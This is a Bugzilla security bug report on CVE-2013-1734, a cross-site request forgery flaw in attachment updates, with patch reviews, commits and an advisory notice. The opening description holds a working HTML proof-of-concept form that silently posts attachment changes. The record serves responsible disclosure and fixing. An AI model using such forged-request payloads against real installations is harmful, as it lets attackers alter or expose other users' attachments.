913904 - (CVE-2013-1734) [SECURITY] CSRF when updating attachments

Status: RESOLVED FIXED

(Bugzilla :: Attachments & Requests, defect)

Description

[Mateusz Goik]

PoC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://landfill.bugzilla.org/bugzilla-tip/attachment.cgi" method="POST">
      <input type="hidden" name="id" value="3100" />
      <input type="hidden" name="action" value="update" />
      <input type="hidden" name="contenttypemethod" value="manual" />
      <input type="hidden" name="delta&#95;ts" value="xxxxxx" />
      <input type="hidden" name="token" value="xxxxx" />
      <input type="hidden" name="description" value="asdasd123" />
      <input type="hidden" name="filename" value="file&#95;21994&#46;txt" />
      <input type="hidden" name="contenttypeentry" value="text&#47;plain" />
      <input type="hidden" name="comment" value="asd" />
      <input type="hidden" name="flag&#95;type&#45;4" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;4" value="" />
      <input type="hidden" name="flag&#95;type&#45;1" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;1" value="" />
      <input type="hidden" name="flag&#95;type&#45;2" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;2" value="" />
      <input type="hidden" name="flag&#95;type&#45;3" value="X" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Comment 1

[Frédéric Buclin]

Attachment: patch for 4.4 and trunk, v1

This patch is similar to the one for process_bug.cgi.

Comment 2

[Frédéric Buclin]

All versions are affected as bug 476603 was an incomplete fix.

Comment 3

[Frédéric Buclin]

Attachment: patch for 4.2, v1

Comment 4

[Frédéric Buclin]

Attachment: patch for 4.0, v1

I had to backport the invalid_timestamp error message which didn't exist before 4.2.

Comment 5

[Daniel Veditz [:dveditz]]

Use CVE-2013-1734

Why sec-critical? This isn't compromising bugzilla in general. Beyond vandalism what's the worst you could do here? Luring a privileged user to un-hide an attachment maybe, revealing a security bug? My initial feel was moderate, but given hidden attachments I could live with sec-high.

Comment 6

[David Lawrence [:dkl]]

Comment on attachment 801238 [details] [diff] [review]
patch for 4.4 and trunk, v1

Review of attachment 801238 [details] [diff] [review]:
-----------------------------------------------------------------

r=dkl

Comment 7

[David Lawrence [:dkl]]

Comment on attachment 801248 [details] [diff] [review]
patch for 4.2, v1

Review of attachment 801248 [details] [diff] [review]:
-----------------------------------------------------------------

r=dkl

Comment 8

[David Lawrence [:dkl]]

Comment on attachment 801251 [details] [diff] [review]
patch for 4.0, v1

Review of attachment 801251 [details] [diff] [review]:
-----------------------------------------------------------------

r=dkl

Comment 10

[Frédéric Buclin]

Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/trunk/
modified attachment.cgi
Committed revision 8778.

Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/4.4/
modified attachment.cgi
Committed revision 8624.

Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/4.2/
modified attachment.cgi
Committed revision 8232.

Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/4.0/
modified attachment.cgi
modified template/en/default/global/code-error.html.tmpl
Committed revision 7760.

Comment 11

[Frédéric Buclin]

Security advisory sent.